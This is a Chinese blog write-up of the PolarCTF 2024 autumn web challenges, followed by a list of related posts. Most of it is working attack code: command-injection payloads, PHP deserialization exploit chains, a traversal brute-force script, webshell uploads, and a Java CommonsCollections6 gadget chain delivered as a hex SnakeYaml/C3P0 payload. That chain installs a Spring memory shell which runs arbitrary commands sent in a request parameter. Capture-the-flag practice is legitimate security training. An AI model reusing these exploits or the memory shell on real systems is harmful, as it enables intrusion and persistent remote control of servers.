【Web】PolarCTF2024秋季个人挑战赛wp

最新推荐文章于 2025-03-26 09:33:45 发布
最新推荐文章于 2025-03-26 09:33:45 发布
阅读量2.3k 收藏 11
点赞数 14
文章标签: polarctf polarctf秋季赛 wp web 题解 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/uuzeray/article/details/142414821
版权

EZ_Host

一眼丁真命令注入

 payload:

?host=127.0.0.1;cat+f*

序列一下

exp:

<?php

class Polar{
    public $lt;
    public $b;
}
$p=new Polar();
$p->lt="system";
$p->b="tac /f*";
echo serialize($p);

payload:

x=O:5:"Polar":2:{s:2:"lt";s:6:"system";s:1:"b";s:7:"tac /f*";}

vm50给你flag

先读waf源码

?file=php://filter/convert.base64-encode/resource=funs.php

base64解码

<?php
include 'f1@g.php';
function myWaf($data)
{
    if (preg_match("/f1@g/i", $data)) {
        echo "NONONONON0!";
        return FALSE;
    } else {
        return TRUE;
    }
}

class A
{
    private $a;

    public function __destruct()
    {
        echo "A->" . $this->a . "destruct!";
    }
}

class B
{
    private $b = array();
    public function __toString()
    {
        $str_array= $this->b;
        $str2 = $str_array['kfc']->vm50;
        return "Crazy Thursday".$str2;
    }
}
class C{
    private $c = array();
    public function __get($kfc){
        global $flag;
        $f = $this->c[$kfc];
        var_dump($$f);
    }
}

exp:

<?php

class A
{
    public $a;
}

class B
{
    public $b;
}
class C{
    public $c;
}

//A#__destruct -> B#__toString -> C#__get
$c=new C();
$b=new B();
$a=new A();
$c->c=array("vm50"=>"flag");
$b->b=array("kfc"=>$c);
$a->a=$b;
echo serialize($a);

payload:

O:1:"A":1:{s:1:"a";O:1:"B":1:{s:1:"b";a:1:{s:3:"kfc";O:1:"C":1:{s:1:"c";a:1:{s:4:"vm50";s:4:"flag";}}}}}

Deserialize 

访问./hidden

访问./hidden/hidden.php 

exp

<?php

class Token {
    public $id;
    public $secret;
}

class User {
    public $name;
    public $isAdmin = false;
    public $token;
}

class Product {
    public $productName;
    public $price;
}

$c=new Product();
$b=new Token();
$a=new User();
$c->productName='1';
$c->price=1;
$b->product=$c;
$b->id=1;
$a->name="Z3r4y";
$a->token=$b;
$a->isAdmin=true;
echo serialize($a);

 payload:

./hidden/hidden.php?data=O:4:"User":3:{s:4:"name";s:5:"Z3r4y";s:7:"isAdmin";b:1;s:5:"token";O:5:"Token":3:{s:2:"id";i:1;s:6:"secret";N;s:7:"product";O:7:"Product":2:{s:11:"productName";s:1:"1";s:5:"price";i:1;}}}

 

 

传马

上传一个png文件抓包改php后缀

访问传的马,RCE

bllbl_ser1

一开始给了php代码

exp:

<?php
class bllbl
{
    public $qiang;//我的强
}
class bllnbnl{
    public $er;//我的儿
}

$b=new bllbl();
$a=new bllnbnl();
$a->er="system('cat /f*');";
$b->qiang=$a;
echo serialize($b);

payload:

?blljl=O:5:"bllbl":1:{s:5:"qiang";O:7:"bllnbnl":1:{s:2:"er";s:18:"system('cat /f*');";}}

 

投喂

 exp:

<?php
class User
{
    public $username;
    public $is_admin;
}

$a=new User();
$a->is_admin=true;
echo serialize($a);

payload:

data=O:4:"User":2:{s:8:"username";N;s:8:"is_admin";b:1;}

raoyiquan

payload:

?c.md=env

读环境变量偷鸡成功 

 

但交了不对()

老老实实绕吧

payload:

?c.md=ta\c /fl\ag.php

1ncIud3

扫出来

?page=flag对应了./flag.php,文件后缀写死了是php

经过测试发现题目会将../替换为空,双写绕过可以目录穿越

?page=..././..././..././..././..././..././..././..././f14g

尝试爆破没结果

import requests
import itertools

# 定义字符和替换的映射,包括 F 大写和 g 替换成 9 的情况
replace_dict = {
    'l': ['1', 'I', 'L', 'l'],
    'a': ['3', '4', 'a', '@'],
    'F': ['F', 'f'],
    'g': ['g', '9']
}

# 目标字符串
original_string = "Flag"

# 找出需要替换的字符及其对应的位置
positions = [(i, char) for i, char in enumerate(original_string) if char in replace_dict]

# 生成所有可能的组合
possible_combinations = []
for combination in itertools.product(*[replace_dict[char] for _, char in positions]):
    temp_string = list(original_string)
    for (pos, _), replacement in zip(positions, combination):
        temp_string[pos] = replacement
    possible_combinations.append("".join(temp_string))

# 基础 URL 模板
base_url = "http://472bb567-85eb-4d41-b194-77ec77dd844e.www.polarctf.com:8090/?page=..././..././..././..././..././..././..././..././{}"

# 循环替换不同的 flag 变体并发起请求
for variant in possible_combinations:
    # 替换 URL 中的 Flag
    url = base_url.format(variant)
    
    try:
        # 发送 GET 请求
        response = requests.get(url)
        
        # 检查响应内容是否包含 "flag"
        if "flag" in response.text.lower():
            print(f"Found 'flag' in the response for variant: {variant}")
            print(f"Response Content:\n{response.text[:100]}")  # 输出前100字符
            print("-" * 80)  # 分隔符
        
    except Exception as e:
        # 捕获异常并打印
        print(f"Error with variant {variant}: {e}")

 后面发现是,鉴定为傻逼题

?page=..././..././f1a9

 

笑傲上传

 

有一个后门

一句话木马插在准备好的图片末尾

cat yjh3.php >> 1.png

上传成功 

 

文件包含RCE 

/include.php?file=/var/www/html/upload/5420240921110122.png

 

SnakeYaml 

不出网打hex

SnakeYaml反序列化分析 - F12~ - 博客园 

自己也写过对应的文章,把fastjson换成snakeyaml就行【Web】浅聊Java反序列化之C3P0——不出网Hex字节码加载利用-CSDN博客 

CC6打spring内存马

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class CC6WithTp {
    public static void main(String[] args) throws Exception {
        TemplatesImpl templates = new TemplatesImpl();
        Class ct = templates.getClass();
        byte[] code = Files.readAllBytes(Paths.get("C:\\Users\\21135\\Desktop\\JeecgBoot-master\\polar\\target\\classes\\exp\\SpringControllerMemShell3.class"));
        byte[][] bytes = {code};
        Field ctDeclaredField = ct.getDeclaredField("_bytecodes");
        ctDeclaredField.setAccessible(true);
        ctDeclaredField.set(templates,bytes);
        Field nameField = ct.getDeclaredField("_name");
        nameField.setAccessible(true);
        nameField.set(templates,"Z3");
        Field tfactory = ct.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());


        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(templates),
                new InvokerTransformer("newTransformer",null,null)
        };

        ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);

        Map<Object,Object> map = new HashMap<>();
        Map<Object,Object> lazyMap = LazyMap.decorate(map,new ConstantTransformer(1));

        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap,"aaa");
//
//        //查看构造函数,传入的key和value
        HashMap<Object, Object> map1 = new HashMap<>();
//        //map的固定语法,必须要put进去,这里的put会将链子连起来,触发命令执行
        map1.put(tiedMapEntry, "bbb");
        lazyMap.remove("aaa");

        Class c = LazyMap.class;
        Field factoryField = c.getDeclaredField("factory");
        factoryField.setAccessible(true);
        factoryField.set(lazyMap,chainedTransformer);

//
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(map1);

        serialize(map1);
    }

    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("./cc6.bin"));
        objectOutputStream.writeObject(obj);
    }
    public static Object unserialize(String filename) throws IOException, ClassNotFoundException {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(filename));
        Object object = objectInputStream.readObject();
        return object;
    }
}

内存马

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.PrintWriter;
import java.lang.reflect.Method;

/**
 * 适用于 SpringMVC+Tomcat的环境,以及Springboot 2.x 环境.
 *   因此比 SpringControllerMemShell.java 更加通用
 *   Springboot 1.x 和 3.x 版本未进行测试
 */
@Controller
public class SpringControllerMemShell3 extends AbstractTranslet {

    public SpringControllerMemShell3() {
        try {
            WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
            RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
            Method method2 = SpringControllerMemShell3.class.getMethod("test");
            RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();

            Method getMappingForMethod = mappingHandlerMapping.getClass().getDeclaredMethod("getMappingForMethod", Method.class, Class.class);
            getMappingForMethod.setAccessible(true);
            RequestMappingInfo info =
                    (RequestMappingInfo) getMappingForMethod.invoke(mappingHandlerMapping, method2, SpringControllerMemShell3.class);

            SpringControllerMemShell3 springControllerMemShell = new SpringControllerMemShell3("aaa");
            mappingHandlerMapping.registerMapping(info, springControllerMemShell, method2);
        } catch (Exception e) {

        }
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }

    public SpringControllerMemShell3(String aaa) {
    }

    @RequestMapping("/malicious")
    public void test() throws IOException {
        HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();
        HttpServletResponse response = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getResponse();
        try {
            String arg0 = request.getParameter("cmd");
            PrintWriter writer = response.getWriter();
            if (arg0 != null) {
                String o = "";
                ProcessBuilder p;
                if (System.getProperty("os.name").toLowerCase().contains("win")) {
                    p = new ProcessBuilder(new String[]{"cmd.exe", "/c", arg0});
                } else {
                    p = new ProcessBuilder(new String[]{"/bin/sh", "-c", arg0});
                }
                java.util.Scanner c = new java.util.Scanner(p.start().getInputStream()).useDelimiter("\\A");
                o = c.hasNext() ? c.next() : o;
                c.close();
                writer.write(o);
                writer.flush();
                writer.close();
            } else {
                response.sendError(404);
            }
        } catch (Exception e) {
        }
    }
}

payload:

data=!!com.mchange.v2.c3p0.WrapperConnectionPoolDataSource%0AuserOverridesAsString%3A%20HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C77080000001000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B78707400036161617372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000027372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E000378707372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000949000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785A00155F75736553657276696365734D656368616E69736D4C00195F61636365737345787465726E616C5374796C6573686565747400124C6A6176612F6C616E672F537472696E673B4C000B5F617578436C617373657374003B4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F486173687461626C653B5B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D6571007E00124C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF00740003616C6C70757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E00200007870000015ECCAFEBABE0000003400F60A003B00800A008100820800830B008400850700860700870B0005008807008908006507008A0A000A008B07008C07008D0A000C008E0A0014008F0800490700900A000A00910A001100920700930A001100940700950800630A000800960A000600970700980700990A001B009A0A001B009B08009C0B009D009E0B009F00A00800A10800A20A00A300A40A002800A50800A60A002800A70700A80700A90800AA0800AB0A002700AC0800AD0800AE0700AF0A002700B00A00B100B20A002E00B30800B40A002E00B50A002E00B60A002E00B70A002E00B80A00B900BA0A00B900BB0A00B900B80B009F00BC0700BD0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010007636F6E746578740100374C6F72672F737072696E676672616D65776F726B2F7765622F636F6E746578742F5765624170706C69636174696F6E436F6E746578743B0100156D617070696E6748616E646C65724D617070696E670100544C6F72672F737072696E676672616D65776F726B2F7765622F736572766C65742F6D76632F6D6574686F642F616E6E6F746174696F6E2F526571756573744D617070696E6748616E646C65724D617070696E673B0100076D6574686F643201001A4C6A6176612F6C616E672F7265666C6563742F4D6574686F643B0100026D7301004E4C6F72672F737072696E676672616D65776F726B2F7765622F736572766C65742F6D76632F636F6E646974696F6E2F526571756573744D6574686F647352657175657374436F6E646974696F6E3B0100136765744D617070696E67466F724D6574686F64010004696E666F01003F4C6F72672F737072696E676672616D65776F726B2F7765622F736572766C65742F6D76632F6D6574686F642F526571756573744D617070696E67496E666F3B010018737072696E67436F6E74726F6C6C65724D656D5368656C6C01001F4C6578702F537072696E67436F6E74726F6C6C65724D656D5368656C6C333B010001650100154C6A6176612F6C616E672F457863657074696F6E3B0100047468697301000D537461636B4D61705461626C650700890700980100097472616E73666F726D010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B01000868616E646C6572730100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A457863657074696F6E730700BE0100104D6574686F64506172616D65746572730100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B010015284C6A6176612F6C616E672F537472696E673B29560100036161610100124C6A6176612F6C616E672F537472696E673B010004746573740100017001001A4C6A6176612F6C616E672F50726F636573734275696C6465723B0100016F010001630100134C6A6176612F7574696C2F5363616E6E65723B010004617267300100067772697465720100154C6A6176612F696F2F5072696E745772697465723B010007726571756573740100274C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B010008726573706F6E73650100284C6A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73653B0700BF0700C00700A90700C10700A80700AF0700C201001952756E74696D6556697369626C65416E6E6F746174696F6E730100384C6F72672F737072696E676672616D65776F726B2F7765622F62696E642F616E6E6F746174696F6E2F526571756573744D617070696E673B01000576616C756501000A2F6D616C6963696F757301000A536F7572636546696C6501001E537072696E67436F6E74726F6C6C65724D656D5368656C6C332E6A61766101002B4C6F72672F737072696E676672616D65776F726B2F73746572656F747970652F436F6E74726F6C6C65723B0C003C003D0700C30C00C400C50100396F72672E737072696E676672616D65776F726B2E7765622E736572766C65742E44697370617463686572536572766C65742E434F4E544558540700C60C00C700C80100356F72672F737072696E676672616D65776F726B2F7765622F636F6E746578742F5765624170706C69636174696F6E436F6E746578740100526F72672F737072696E676672616D65776F726B2F7765622F736572766C65742F6D76632F6D6574686F642F616E6E6F746174696F6E2F526571756573744D617070696E6748616E646C65724D617070696E670C00C900CA01001D6578702F537072696E67436F6E74726F6C6C65724D656D5368656C6C3301000F6A6176612F6C616E672F436C6173730C00CB00CC01004C6F72672F737072696E676672616D65776F726B2F7765622F736572766C65742F6D76632F636F6E646974696F6E2F526571756573744D6574686F647352657175657374436F6E646974696F6E0100356F72672F737072696E676672616D65776F726B2F7765622F62696E642F616E6E6F746174696F6E2F526571756573744D6574686F640C003C00CD0C00CE00CF0100186A6176612F6C616E672F7265666C6563742F4D6574686F640C00D000CC0C00D100D20100106A6176612F6C616E672F4F626A6563740C00D300D401003D6F72672F737072696E676672616D65776F726B2F7765622F736572766C65742F6D76632F6D6574686F642F526571756573744D617070696E67496E666F0C003C00620C00D500D60100136A6176612F6C616E672F457863657074696F6E0100406F72672F737072696E676672616D65776F726B2F7765622F636F6E746578742F726571756573742F536572766C657452657175657374417474726962757465730C00D700D80C00D900DA010003636D640700BF0C00DB00DC0700C00C00DD00DE0100000100076F732E6E616D650700DF0C00E000DC0C00E100E201000377696E0C00E300E40100186A6176612F6C616E672F50726F636573734275696C6465720100106A6176612F6C616E672F537472696E67010007636D642E6578650100022F630C003C00E50100072F62696E2F73680100022D630100116A6176612F7574696C2F5363616E6E65720C00E600E70700E80C00E900EA0C003C00EB0100025C410C00EC00ED0C00EE00EF0C00F000E20C00F1003D0700C10C00F200620C00F3003D0C00F400F5010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C6574010039636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F5472616E736C6574457863657074696F6E0100256A617661782F736572766C65742F687474702F48747470536572766C6574526571756573740100266A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73650100136A6176612F696F2F5072696E745772697465720100136A6176612F696F2F494F457863657074696F6E01003C6F72672F737072696E676672616D65776F726B2F7765622F636F6E746578742F726571756573742F52657175657374436F6E74657874486F6C64657201001863757272656E74526571756573744174747269627574657301003D28294C6F72672F737072696E676672616D65776F726B2F7765622F636F6E746578742F726571756573742F52657175657374417474726962757465733B0100396F72672F737072696E676672616D65776F726B2F7765622F636F6E746578742F726571756573742F526571756573744174747269627574657301000C676574417474726962757465010027284C6A6176612F6C616E672F537472696E673B49294C6A6176612F6C616E672F4F626A6563743B0100076765744265616E010025284C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F4F626A6563743B0100096765744D6574686F64010040284C6A6176612F6C616E672F537472696E673B5B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F4D6574686F643B01003B285B4C6F72672F737072696E676672616D65776F726B2F7765622F62696E642F616E6E6F746174696F6E2F526571756573744D6574686F643B2956010008676574436C61737301001328294C6A6176612F6C616E672F436C6173733B0100116765744465636C617265644D6574686F6401000D73657441636365737369626C65010004285A2956010006696E766F6B65010039284C6A6176612F6C616E672F4F626A6563743B5B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B01000F72656769737465724D617070696E6701006E284C6F72672F737072696E676672616D65776F726B2F7765622F736572766C65742F6D76632F6D6574686F642F526571756573744D617070696E67496E666F3B4C6A6176612F6C616E672F4F626A6563743B4C6A6176612F6C616E672F7265666C6563742F4D6574686F643B295601000A6765745265717565737401002928294C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B01000B676574526573706F6E736501002A28294C6A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73653B01000C676574506172616D65746572010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B01000967657457726974657201001728294C6A6176612F696F2F5072696E745772697465723B0100106A6176612F6C616E672F53797374656D01000B67657450726F706572747901000B746F4C6F7765724361736501001428294C6A6176612F6C616E672F537472696E673B010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A010016285B4C6A6176612F6C616E672F537472696E673B2956010005737461727401001528294C6A6176612F6C616E672F50726F636573733B0100116A6176612F6C616E672F50726F6365737301000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B010018284C6A6176612F696F2F496E70757453747265616D3B295601000C75736544656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C2F5363616E6E65723B0100076861734E65787401000328295A0100046E657874010005636C6F73650100057772697465010005666C75736801000973656E644572726F720100042849295600210008003B0000000000050001003C003D0001003E0000015400060008000000882AB70001B80002120303B900040300C000054C2B1206B900070200C000064D1208120903BD000AB6000B4EBB000C5903BD000DB7000E3A042CB6000F121005BD000A59031211535904120A53B600123A05190504B6001319052C05BD001459032D535904120853B60015C000163A06BB0008591217B700183A072C190619072DB60019A700044CB10001000400830086001A0003003F0000003A000E0000001F0004002100130022001F0023002B002400380026005100270057002800670029006F002B007A002C0083002F0086002D0087003000400000005C000900130070004100420001001F0064004300440002002B00580045004600030038004B00470048000400510032004900460005006F0014004A004B0006007A0009004C004D000700870000004E004F0001000000880050004D00000051000000100002FF008600010700520001070053000001005400550003003E0000003F0000000300000001B100000002003F000000060001000000350040000000200003000000010050004D00000000000100560057000100000001005800590002005A000000040001005B005C0000000902005600000058000000010054005D0003003E000000490000000400000001B100000002003F0000000600010000003A00400000002A0004000000010050004D00000000000100560057000100000001005E005F000200000001006000610003005A000000040001005B005C0000000D0300560000005E0000006000000001003C00620002003E0000003D00010002000000052AB70001B100000002003F0000000A00020000003C0004003D0040000000160002000000050050004D000000000005006300640001005C00000005010063000000010065003D0003003E000001E100060008000000CDB80002C0001BC0001BB6001C4CB80002C0001BC0001BB6001D4D2B121EB9001F02004E2CB9002001003A042DC6009312213A051222B80023B600241225B60026990021BB00275906BD002859031229535904122A5359052D53B7002B3A06A7001EBB00275906BD00285903122C535904122D5359052D53B7002B3A06BB002E591906B6002FB60030B700311232B600333A071907B6003499000B1907B60035A7000519053A051907B6003619041905B600371904B600381904B60039A7000C2C110194B9003A0200A700044EB10001001A00C800CB001A0003003F00000052001400000041000D0042001A004400230045002B0046002F0047003300490043004A0061004C007C004E0092004F00A6005000AB005100B2005200B7005300BC005400BF005500C8005800CB005700CC0059004000000066000A005E000300660067000600330089006800640005007C00400066006700060092002A0069006A0007002300A5006B00640003002B009D006C006D000400CC0000004E004F0003000000CD0050004D0000000D00C0006E006F0001001A00B30070007100020051000000360008FF006100060700520700720700730700740700750700740000FC001A070076FC002507007741070074F8001AF900084207005300005A000000040001007800790000000E0001007A0001007B5B000173007C0002007D00000002007E0079000000060001007F0000707400025A3370770100787372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D6571007E00125B000B69506172616D547970657371007E001578707074000E6E65775472616E73666F726D6572707371007E00003F4000000000000C77080000001000000000787874000362626278%3B%0A

Z3r4y
关注
PolarCTF2024冬季个人挑战赛wpweb、misc、crypto_polar冬季
2401_83621784的博客
04-15 1130
是php.ini中的一个配置选项,它可将用户访问文件的活动范围限制在指定的区域,假设open_basedir=/home/wwwroot/home/web1/:/tmp/,那么通过web1访问服务器的用户就无法获取服务器上除了/home/wwwroot/home/web1/和/tmp/这两个目录以外的文件。(补题发现,秋季那道ezupload,上传GIF文件,再抓包改php后缀,蚁剑,不过我连接的时候,警告返回数据为空?上传文件之后,可以F12查看网络,就可以看到文件上传的位置了,再用蚁剑连接即可。
PolarD&N-CTF-web方向-中等
J1ng_Hong的博客
12-12 2843
(由于发现中等题里面有许多新的知识点,所以特意拉了一个新的博客来展示)
Polarctf靶场做题——8字节能干什么(我觉得好详细哦)
2301_76262491的博客
10-13 1787
哎~就这题我一看名字我就知道这个是栈迁移,然后ida一看果然是栈迁移,一个小白能有什么坏心思呢,只是想做题提升一下罢了
PolarCTF网络安全2025春季个人挑战赛 web方向个人wp
最新发布
Python1111111的博客
03-26 1181
打开环境,页面是ctf变强之路,有三个按钮,随便点一个发现url后面拼上了/index.php?发现好几个文件,尝试直接访问flag.php,不出意外肯定是打不开的,我们尝试访问/login.php,发现被forbidden了打不开,再看/upload_file.php,没啥用,再看最后一个/users.json,发现是一堆用户名密码,随便用一个登录。打开环境,是一个输入框,提示是执行命令的地方,尝试ls /发现回显no,猜测是被过滤了,我们dirsearch扫一下。
polar CTF CB链
samRsa
01-14 1155
polar CTF CB链 使用ysoserial项目中的CommonsBeanutils1链写一个POC,注意确保ysoserial项目中的pom.xml中的commons-beanutils与题目一致;ysoserial项目地址:https://github.com/frohoff/ysoserial。看到存在commons-beanutils依赖且版本为1.9.2,可利用CB链Getshell。1、通过jar包,可以看到/user路由下有反序列化操作。
polarctf靶场【web】session文件包含、自由的文件上传系统、爆破、XFF、 rce1、iphone、ezupload
m0_73981089的博客
04-26 2426
session文件包含、文件包含、XXF伪造、rce、UA的修改、文件上传漏洞、爆破
polarctf靶场 【web】签到题、简单 rce、蜜雪冰城吉警店、到底给不给flag呢
m0_73981089的博客
04-24 2977
此时注意GET数组的值,$ _GET["flag"]=Polar​,而经过$_POST​的变量覆盖,​$ _GET =array(1) { ["flag"]=> string(4) "flag" } ​,故而最开始传GET参数时?并且value不能等于flag,若想输出执行到最后输出flag,那么变量覆盖时候不能将$flag 的值等于除flag 外的任意值,也就是说在foreach内的变量覆盖过程,需要实现。这样被解析之后,就是c=flag&flag=c。方法二:字符串转义绕过;
PolarCTF2023冬季个人挑战赛wpweb、misc、crypto_polar冬季
2401_84558406的博客
05-17 1028
因为php是不能直接给private和protected的变量直接赋值的,所以rand()函数直接废掉,不起作用又或者变量引用。
PolarD&N靶场题解
qq_43423311的博客
03-23 2976
PolarD&N CTF靶场。
polarctf靶场[WEB]cookie欺骗、upload、签到
m0_73981089的博客
08-25 1140
[web]cookie欺骗    考点:cookie值    工具:Burp Suite抓包 [web]upload    考点:双写绕过    工具:Burp Suite抓包、蚁剑 [web]签到    考点:修改前端、html、disabled 、maxlength
Polarctf靶场[MISC]docx隐写、找到我我就让你嘿嘿嘿
m0_73981089的博客
05-21 884
  [misc]docx隐写     考点:docx隐写     工具:word 、010editor   [misc]找到我我就让你嘿嘿嘿     考点:根据信息找地址     工具:高德地图or百度地图、md5加密
PolarCTF】三段密码
m0_73818758的博客
09-24 398
最后拼接得到flag为:flag{7782bbc56f03fabe56689bfc7e3b32b1}下载题目附件并解压,得到三个文件,由题目可得,三个文件分别对应flag的三个部分。第二部分为:6f03fabe56689b。第一部分为:flag{7782bbc5。
PolarCTF 2024冬季个人挑战赛 WriteUp (pwn部分)_polar ctf 东北话是最好的语言
Python毕设源码程序王哥
04-12 1052
(2)然后,查看del_note()函数该函数根据用户输入的 Index 值来确定删除哪一个note,第二个红框中,对存放note和puts函数的内存空间都进行了释放,但没有将指针置空,存在漏洞可以发现,题目给出的程序存在后门函数magic,通过执行该函数可以获取flag。那么,可以尝试将del_note()函数中未置空的指针指向magic函数的地址,进而执行该后门函数。
PolarCTF】康师傅
m0_63253319的博客
10-12 355
PolarD&N CTF -- 康师傅 题解
i春秋-CTF-Misc-小试身手
Alita_lxz的博客
03-20 672
这个题目比较简单,下载之后,有一个misc100.zip的压缩包,将他解压,可以成功解压 不知所措 ,先看看各个文件夹有没有可疑的文件,在res/raw文件夹看到一个可疑文件hehe 二话不说,记事本先打开看看, flag到手,真的是很简单 ...
PolarD&N(swp
果粒程
04-15 1098
根据提示去找swp文件,首先了解什么是swp文件swp即swap(交换分区)的简写,在编辑文件时产生,它是隐藏文件。这个文件是一个临时交换文件,用来备份缓冲区中的内容。类似于Windows的虚拟内存,就是当内存不足的时候,把一部分硬盘空间虚拟成内存使用,从而解决内存容量不足的情况。如果文件正常退出,则此文件自动删除。如果并没有对文件进行修改,而只是读取文件,是不会产生swp文件的.swp的产生1.当你用多个程序编辑同一个文件时。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 1530
